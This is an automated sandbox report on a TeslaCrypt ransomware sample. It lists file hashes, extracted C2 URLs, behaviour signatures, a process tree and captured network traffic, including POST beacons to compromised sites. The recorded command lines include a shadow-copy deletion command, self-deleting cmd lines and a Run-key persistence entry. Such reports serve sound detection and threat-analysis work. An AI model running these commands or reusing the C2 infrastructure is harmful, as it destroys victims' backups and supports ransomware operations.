Analysis
- max time kernel: 120s
- max time network: 121s
- platform: windows10-2004_x64
- resource: win10v2004-20241007-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 21/01/2025, 08:42 UTC

Static task: static1

Behavioral task: behavioral1
- Sample: e3ed211653338adaff59cb0d6161174044018a84b49fa6ee2fab9dccd1221ced.exe
- Resource: win7-20241010-en

Behavioral task: behavioral2
- Sample: e3ed211653338adaff59cb0d6161174044018a84b49fa6ee2fab9dccd1221ced.exe
- Resource: win10v2004-20241007-en
General
- Target: e3ed211653338adaff59cb0d6161174044018a84b49fa6ee2fab9dccd1221ced.exe
- Size: 371KB
- MD5: c192a273a786b569df2056914faf8327
- SHA1: 87f24f470d678deae2cade1d3fd12255e796c091
- SHA256: e3ed211653338adaff59cb0d6161174044018a84b49fa6ee2fab9dccd1221ced
- SHA512: 8e036f23c66fbd545fd03aba423a47bf422cee52204fc3a2fb2682fd00a31c2f3e6dc982d01fa30ab2f8ba0b3463a763e403b212f00fe9488b2791dd03629427
- SSDEEP: 6144:QtttRvGxiRcePUSrcTQ+Yd6v6AlYhZ+ddp5GuZEE86Yrp0eWIxQO6kUUecBlzJbu:EttRveivPrcqd26A+hcdp5GYEE8D3WIe
Malware Config
- Extracted from: C:\Program Files\7-Zip\Lang\_RECoVERY_+hrehg.txt
- Family: teslacrypt
- C2 URLs:
  - http://yyre45dbvn2nhbefbmh.begumvelic.at/C0716909F59A9C3
  - http://uiredn4njfsa4234bafb32ygjdawfvs.frascuft.com/C0716909F59A9C3
  - http://gwe32fdr74bhfsyujb34gfszfv.zatcurr.com/C0716909F59A9C3
  - http://xlowfznrg4wf7dli.ONION/C0716909F59A9C3
Signatures

TeslaCrypt, AlphaCrypt
Ransomware based on CryptoLocker. Shut down by the developers in 2016.

Teslacrypt family

Deletes shadow copies (3 TTPs)
Ransomware often targets backup files to inhibit system recovery.

Renames multiple (876) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.

Checks computer location settings (2 TTPs, 2 IoCs)
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | e3ed211653338adaff59cb0d6161174044018a84b49fa6ee2fab9dccd1221ced.exe
Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | cdxnmauxndwm.exe
Drops startup file (6 IoCs)
description | ioc | Process
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\_RECoVERY_+hrehg.png | cdxnmauxndwm.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\_RECoVERY_+hrehg.txt | cdxnmauxndwm.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\_RECoVERY_+hrehg.html | cdxnmauxndwm.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_RECoVERY_+hrehg.png | cdxnmauxndwm.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_RECoVERY_+hrehg.txt | cdxnmauxndwm.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_RECoVERY_+hrehg.html | cdxnmauxndwm.exe

Executes dropped EXE (2 IoCs)
pid | Process
3172 | cdxnmauxndwm.exe
5008 | cdxnmauxndwm.exe
Reads user/profile data of web browsers (3 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Adds Run key to start application (2 TTPs, 1 IoC)
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fmtutyxfcqid = "C:\\Windows\\system32\\cmd.exe /c start \"\" \"C:\\Windows\\cdxnmauxndwm.exe\"" | cdxnmauxndwm.exe
Indicator Removal: File Deletion (1 TTP)
Adversaries may delete files left behind by the actions of their intrusion activity.

Suspicious use of SetThreadContext (2 IoCs)
description | pid | Process | procid_target
PID 1132 set thread context of 1312 | 1132 | e3ed211653338adaff59cb0d6161174044018a84b49fa6ee2fab9dccd1221ced.exe | 98
PID 3172 set thread context of 5008 | 3172 | cdxnmauxndwm.exe | 104
Drops file in Program Files directory (64 IoCs)
Drops file in Windows directory (2 IoCs)
description | ioc | Process
File created | C:\Windows\cdxnmauxndwm.exe | e3ed211653338adaff59cb0d6161174044018a84b49fa6ee2fab9dccd1221ced.exe
File opened for modification | C:\Windows\cdxnmauxndwm.exe | e3ed211653338adaff59cb0d6161174044018a84b49fa6ee2fab9dccd1221ced.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery (1 TTP, 7 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cdxnmauxndwm.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | NOTEPAD.EXE
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | e3ed211653338adaff59cb0d6161174044018a84b49fa6ee2fab9dccd1221ced.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | e3ed211653338adaff59cb0d6161174044018a84b49fa6ee2fab9dccd1221ced.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cdxnmauxndwm.exe
Enumerates system info in registry (2 TTPs, 3 IoCs)
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe

Modifies registry class (1 IoC)
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings | cdxnmauxndwm.exe

Opens file in notepad (likely ransom note) (1 IoC)
pid | Process
4360 | NOTEPAD.EXE
Suspicious behavior: EnumeratesProcesses (64 IoCs)
pid | Process
5008 | cdxnmauxndwm.exe (64 identical entries)
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (2 IoCs)
pid | Process
3796 | msedge.exe (2 identical entries)
Suspicious use of AdjustPrivilegeToken (64 IoCs)
pid | Process | Tokens
1312 | e3ed211653338adaff59cb0d6161174044018a84b49fa6ee2fab9dccd1221ced.exe | SeDebugPrivilege
5008 | cdxnmauxndwm.exe | SeDebugPrivilege
3712 | WMIC.exe | SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36 (this sequence is recorded twice)
2112 | vssvc.exe | SeBackupPrivilege, SeRestorePrivilege, SeAuditPrivilege
748 | WMIC.exe | SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege
Suspicious use of FindShellTrayWindow (25 IoCs)
pid | Process
3796 | msedge.exe (25 identical entries)

Suspicious use of SendNotifyMessage (24 IoCs)
pid | Process
3796 | msedge.exe (24 identical entries)
Suspicious use of WriteProcessMemory (64 IoCs)
description | pid | Process | procid_target | entries
PID 1132 wrote to memory of 1312 | 1132 | e3ed211653338adaff59cb0d6161174044018a84b49fa6ee2fab9dccd1221ced.exe | 98 | 9
PID 1312 wrote to memory of 3172 | 1312 | e3ed211653338adaff59cb0d6161174044018a84b49fa6ee2fab9dccd1221ced.exe | 99 | 3
PID 1312 wrote to memory of 4432 | 1312 | e3ed211653338adaff59cb0d6161174044018a84b49fa6ee2fab9dccd1221ced.exe | 100 | 3
PID 3172 wrote to memory of 5008 | 3172 | cdxnmauxndwm.exe | 104 | 9
PID 5008 wrote to memory of 3712 | 5008 | cdxnmauxndwm.exe | 105 | 2
PID 5008 wrote to memory of 4360 | 5008 | cdxnmauxndwm.exe | 111 | 3
PID 5008 wrote to memory of 3796 | 5008 | cdxnmauxndwm.exe | 112 | 2
PID 3796 wrote to memory of 3632 | 3796 | msedge.exe | 113 | 2
PID 5008 wrote to memory of 748 | 5008 | cdxnmauxndwm.exe | 114 | 2
PID 3796 wrote to memory of 3652 | 3796 | msedge.exe | 116 | 29
System policy modification (1 TTP, 2 IoCs)
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | cdxnmauxndwm.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" | cdxnmauxndwm.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
(indentation shows the parent/child relationship in the process tree)

- C:\Users\Admin\AppData\Local\Temp\e3ed211653338adaff59cb0d6161174044018a84b49fa6ee2fab9dccd1221ced.exe (PID 1132)
  Command line: "C:\Users\Admin\AppData\Local\Temp\e3ed211653338adaff59cb0d6161174044018a84b49fa6ee2fab9dccd1221ced.exe"
  Signatures: Suspicious use of SetThreadContext; System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
  - C:\Users\Admin\AppData\Local\Temp\e3ed211653338adaff59cb0d6161174044018a84b49fa6ee2fab9dccd1221ced.exe (PID 1312)
    Command line: "C:\Users\Admin\AppData\Local\Temp\e3ed211653338adaff59cb0d6161174044018a84b49fa6ee2fab9dccd1221ced.exe"
    Signatures: Checks computer location settings; Drops file in Windows directory; System Location Discovery: System Language Discovery; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - C:\Windows\cdxnmauxndwm.exe (PID 3172)
      Command line: C:\Windows\cdxnmauxndwm.exe
      Signatures: Executes dropped EXE; Suspicious use of SetThreadContext; System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
      - C:\Windows\cdxnmauxndwm.exe (PID 5008)
        Command line: C:\Windows\cdxnmauxndwm.exe
        Signatures: Checks computer location settings; Drops startup file; Executes dropped EXE; Adds Run key to start application; Drops file in Program Files directory; System Location Discovery: System Language Discovery; Modifies registry class; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory; System policy modification
        - C:\Windows\System32\wbem\WMIC.exe (PID 3712)
          Command line: "C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete /nointeractive
          Signatures: Suspicious use of AdjustPrivilegeToken
        - C:\Windows\SysWOW64\NOTEPAD.EXE (PID 4360)
          Command line: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\RECOVERY.TXT
          Signatures: System Location Discovery: System Language Discovery; Opens file in notepad (likely ransom note)
        - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3796)
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\RECOVERY.HTM
          Signatures: Enumerates system info in registry; Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary; Suspicious use of FindShellTrayWindow; Suspicious use of SendNotifyMessage; Suspicious use of WriteProcessMemory
          - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3632)
            Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffdd7e46f8,0x7fffdd7e4708,0x7fffdd7e4718
          - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3652)
            Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,15045793499681320551,730266638985055113,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2144 /prefetch:2
          - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4804)
            Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,15045793499681320551,730266638985055113,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 /prefetch:3
          - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4900)
            Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2132,15045793499681320551,730266638985055113,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2352 /prefetch:8
          - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4936)
            Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,15045793499681320551,730266638985055113,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3136 /prefetch:1
          - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3372)
            Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,15045793499681320551,730266638985055113,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3148 /prefetch:1
          - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe (PID 3232)
            Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,15045793499681320551,730266638985055113,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5192 /prefetch:8
        - C:\Windows\System32\wbem\WMIC.exe (PID 748)
          Command line: "C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete /nointeractive
          Signatures: Suspicious use of AdjustPrivilegeToken
        - C:\Windows\SysWOW64\cmd.exe (PID 2256)
          Command line: "C:\Windows\system32\cmd.exe" /c DEL C:\Windows\CDXNMA~1.EXE
          Signatures: System Location Discovery: System Language Discovery
    - C:\Windows\SysWOW64\cmd.exe (PID 4432)
      Command line: "C:\Windows\system32\cmd.exe" /c DEL C:\Users\Admin\AppData\Local\Temp\E3ED21~1.EXE
      Signatures: System Location Discovery: System Language Discovery
- C:\Windows\system32\vssvc.exe (PID 2112)
  Command line: C:\Windows\system32\vssvc.exe
  Signatures: Suspicious use of AdjustPrivilegeToken
- C:\Windows\System32\CompPkgSrv.exe (PID 4792)
  Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding
- C:\Windows\System32\CompPkgSrv.exe (PID 3292)
  Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding
Network
-
Remote address: 8.8.8.8:53
Request: 8.8.8.8.in-addr.arpa IN PTR
Response: 8.8.8.8.in-addr.arpa IN PTR dns.google
-
Remote address: 8.8.8.8:53
Request: 13.86.106.20.in-addr.arpa IN PTR
Response: (none)
-
Remote address: 8.8.8.8:53
Request: 172.214.232.199.in-addr.arpa IN PTR
Response: (none)
-
Remote address: 8.8.8.8:53
Request: 0.159.190.20.in-addr.arpa IN PTR
Response: (none)
-
Remote address: 8.8.8.8:53
Request: 167.173.78.104.in-addr.arpa IN PTR
Response: 167.173.78.104.in-addr.arpa IN PTR a104-78-173-167.deploy.static.akamaitechnologies.com
-
Remote address: 8.8.8.8:53
Request: 241.150.49.20.in-addr.arpa IN PTR
Response: (none)
-
Remote address: 8.8.8.8:53
Request: 56.163.245.4.in-addr.arpa IN PTR
Response: (none)
-
Remote address: 8.8.8.8:53
Request: 241.42.69.40.in-addr.arpa IN PTR
Response: (none)
-
Remote address: 8.8.8.8:53
Request: 172.210.232.199.in-addr.arpa IN PTR
Response: (none)
-
Remote address: 8.8.8.8:53
Request: 21.49.80.91.in-addr.arpa IN PTR
Response: (none)
-
Remote address: 8.8.8.8:53
Request: biocarbon.com.ec IN A
Response: biocarbon.com.ec IN A 162.241.224.203
-
Remote address: 162.241.224.203:80
Request:
POST /wp-content/uploads/bstr.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
Host: biocarbon.com.ec
Content-Length: 645
Cache-Control: no-cache
Response:
HTTP/1.1 301 Moved Permanently
Server: nginx/1.25.5
Content-Type: text/html; charset=iso-8859-1
Content-Length: 242
Location: https://biocarbon.com.ec/403.shtml
X-Server-Cache: false
host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
-
Remote address: 8.8.8.8:53
Request: 203.224.241.162.in-addr.arpa IN PTR
Response: 203.224.241.162.in-addr.arpa IN PTR box5210.bluehost.com
-
Remote address: 162.241.224.203:443
Request:
GET /403.shtml HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
Cache-Control: no-cache
Host: biocarbon.com.ec
Connection: Keep-Alive
Response:
HTTP/1.1 404 Not Found
Server: nginx/1.25.5
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Link: <https://biocarbon.com.ec/wp-json/>; rel="https://api.w.org/"
Vary: Accept-Encoding
host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
Transfer-Encoding: chunked
-
Remote address: 8.8.8.8:53
Request: r10.o.lencr.org IN A
Response: r10.o.lencr.org IN CNAME o.lencr.edgesuite.net; o.lencr.edgesuite.net IN CNAME a1887.dscq.akamai.net; a1887.dscq.akamai.net IN A 88.221.135.105; a1887.dscq.akamai.net IN A 88.221.134.89
-
GET http://r10.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRpD%2BQVZ%2B1vf7U0RGQGBm8JZwdxcgQUdKR2KRcYVIUxN75n5gZYwLzFBXICEgPdudvodJRcElz6vtmmu4TyWg%3D%3D (process: cdxnmauxndwm.exe)
Remote address: 88.221.135.105:80
Request:
GET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBRpD%2BQVZ%2B1vf7U0RGQGBm8JZwdxcgQUdKR2KRcYVIUxN75n5gZYwLzFBXICEgPdudvodJRcElz6vtmmu4TyWg%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: r10.o.lencr.org
Response:
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Content-Length: 504
ETag: "EDBF6B39418DCF40055F1049DB26A0AAFD7B045BC5FBEB2E9E7D81474DBA565F"
Last-Modified: Tue, 21 Jan 2025 10:25:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=21566
Expires: Tue, 21 Jan 2025 16:25:06 GMT
Date: Tue, 21 Jan 2025 10:25:40 GMT
Connection: keep-alive
-
Remote address: 8.8.8.8:53
Request: 168.245.100.95.in-addr.arpa IN PTR
Response: 168.245.100.95.in-addr.arpa IN PTR a95-100-245-168.deploy.static.akamaitechnologies.com
-
Remote address: 8.8.8.8:53
Request: 105.135.221.88.in-addr.arpa IN PTR
Response: 105.135.221.88.in-addr.arpa IN PTR a88-221-135-105.deploy.static.akamaitechnologies.com
-
Remote address: 8.8.8.8:53
Request: imagescroll.com IN A
Response: (none)
-
Remote address: 8.8.8.8:53
Request: music.mbsaeger.com IN A
Response: (none)
-
Remote address: 8.8.8.8:53
Request: stacon.eu IN A
Response: stacon.eu IN A 85.128.128.104
-
Remote address: 85.128.128.104:80
Request:
POST /bstr.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
Host: stacon.eu
Content-Length: 645
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
X-CDN-nazwa.pl-location: AMS
X-CDN-nazwa.pl-policyused: cdn=1209600
Server: Apache/2
-
Remote address: 8.8.8.8:53
Request: surrogacyandadoption.com IN A
Response: surrogacyandadoption.com IN CNAME comingsoon.namebright.com; comingsoon.namebright.com IN CNAME cdl-lb-1356093980.us-east-1.elb.amazonaws.com; cdl-lb-1356093980.us-east-1.elb.amazonaws.com IN A 54.85.129.208; cdl-lb-1356093980.us-east-1.elb.amazonaws.com IN A 34.193.158.132
-
Remote address: 54.85.129.208:80
Request:
POST /bstr.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
Host: surrogacyandadoption.com
Content-Length: 645
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address: 8.8.8.8:53
Request: worldisonefamily.info IN A
Response: worldisonefamily.info IN A 104.155.138.21; worldisonefamily.info IN A 107.178.223.183
-
Remote address: 8.8.8.8:53
Request: 104.128.128.85.in-addr.arpa IN PTR
Response: 104.128.128.85.in-addr.arpa IN PTR static-ajw104.rev.nazwa.pl
-
Remote address: 8.8.8.8:53
Request: 208.129.85.54.in-addr.arpa IN PTR
Response: 208.129.85.54.in-addr.arpa IN PTR ec2-54-85-129-208.compute-1.amazonaws.com
-
Remote address: 104.155.138.21:80
Request:
POST /zz/libraries/bstr.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
Host: worldisonefamily.info
Content-Length: 645
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
-
Remote address: 8.8.8.8:53
Request: 21.138.155.104.in-addr.arpa IN PTR
Response: 21.138.155.104.in-addr.arpa IN PTR 21.138.155.104.bc.googleusercontent.com
-
Remote address: 8.8.8.8:53
Request: 60.153.16.2.in-addr.arpa IN PTR
Response: 60.153.16.2.in-addr.arpa IN PTR a2-16-153-60.deploy.static.akamaitechnologies.com
-
Remote address: 162.241.224.203:80
Request:
POST /wp-content/uploads/bstr.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
Host: biocarbon.com.ec
Content-Length: 645
Cache-Control: no-cache
Response:
HTTP/1.1 301 Moved Permanently
Server: nginx/1.25.5
Content-Type: text/html; charset=iso-8859-1
Content-Length: 242
Location: https://biocarbon.com.ec/403.shtml
X-Server-Cache: false
host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
-
Remote address: 162.241.224.203:443
Request:
GET /403.shtml HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
Cache-Control: no-cache
Host: biocarbon.com.ec
Connection: Keep-Alive
Response:
HTTP/1.1 404 Not Found
Server: nginx/1.25.5
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Link: <https://biocarbon.com.ec/wp-json/>; rel="https://api.w.org/"
Vary: Accept-Encoding
host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
Transfer-Encoding: chunked
-
Remote address: 8.8.8.8:53
Request: 14.160.190.20.in-addr.arpa IN PTR
Response: (none)
-
Remote address: 8.8.8.8:53
Request: imagescroll.com IN A
Response: (none)
-
Remote address: 8.8.8.8:53
Request: music.mbsaeger.com IN A
Response: (none)
-
Remote address: 85.128.128.104:80
Request:
POST /bstr.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
Host: stacon.eu
Content-Length: 645
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
X-CDN-nazwa.pl-location: AMS
X-CDN-nazwa.pl-policyused: cdn=1209600
Server: Apache/2
-
Remote address: 54.85.129.208:80
Request:
POST /bstr.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
Host: surrogacyandadoption.com
Content-Length: 645
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address: 104.155.138.21:80
Request:
POST /zz/libraries/bstr.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
Host: worldisonefamily.info
Content-Length: 645
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
-
1.2kB 725 B 6 5
HTTP Request: POST http://biocarbon.com.ec/wp-content/uploads/bstr.php
HTTP Response: 301
-
2.4kB 44.4kB 41 37
HTTP Request: GET https://biocarbon.com.ec/403.shtml
HTTP Response: 404
-
88.221.135.105:80 http://r10.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRpD%2BQVZ%2B1vf7U0RGQGBm8JZwdxcgQUdKR2KRcYVIUxN75n5gZYwLzFBXICEgPdudvodJRcElz6vtmmu4TyWg%3D%3D http cdxnmauxndwm.exe
470 B 1.0kB 5 3
HTTP Request: GET http://r10.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRpD%2BQVZ%2B1vf7U0RGQGBm8JZwdxcgQUdKR2KRcYVIUxN75n5gZYwLzFBXICEgPdudvodJRcElz6vtmmu4TyWg%3D%3D
HTTP Response: 200
-
1.1kB 588 B 6 5
HTTP Request: POST http://stacon.eu/bstr.php
HTTP Response: 200
-
1.6kB 13.3kB 16 13
HTTP Request: POST http://surrogacyandadoption.com/bstr.php
HTTP Response: 200
-
1.2kB 250 B 6 5
HTTP Request: POST http://worldisonefamily.info/zz/libraries/bstr.php
HTTP Response: 200
-
1.1kB 645 B 5 3
HTTP Request: POST http://biocarbon.com.ec/wp-content/uploads/bstr.php
HTTP Response: 301
-
2.4kB 40.9kB 38 34
HTTP Request: GET https://biocarbon.com.ec/403.shtml
HTTP Response: 404
-
1.1kB 508 B 5 3
HTTP Request: POST http://stacon.eu/bstr.php
HTTP Response: 200
-
1.6kB 13.3kB 16 13
HTTP Request: POST http://surrogacyandadoption.com/bstr.php
HTTP Response: 200
-
1.2kB 250 B 7 5
HTTP Request: POST http://worldisonefamily.info/zz/libraries/bstr.php
HTTP Response: 200
-
66 B 90 B 1 1
DNS Request
8.8.8.8.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
13.86.106.20.in-addr.arpa
-
74 B 128 B 1 1
DNS Request
172.214.232.199.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
0.159.190.20.in-addr.arpa
-
73 B 139 B 1 1
DNS Request
167.173.78.104.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
241.150.49.20.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
56.163.245.4.in-addr.arpa
-
71 B 145 B 1 1
DNS Request
241.42.69.40.in-addr.arpa
-
74 B 128 B 1 1
DNS Request
172.210.232.199.in-addr.arpa
-
70 B 145 B 1 1
DNS Request
21.49.80.91.in-addr.arpa
-
62 B 78 B 1 1
DNS Request
biocarbon.com.ec
DNS Response
162.241.224.203
-
74 B 108 B 1 1
DNS Request
203.224.241.162.in-addr.arpa
-
61 B 160 B 1 1
DNS Request
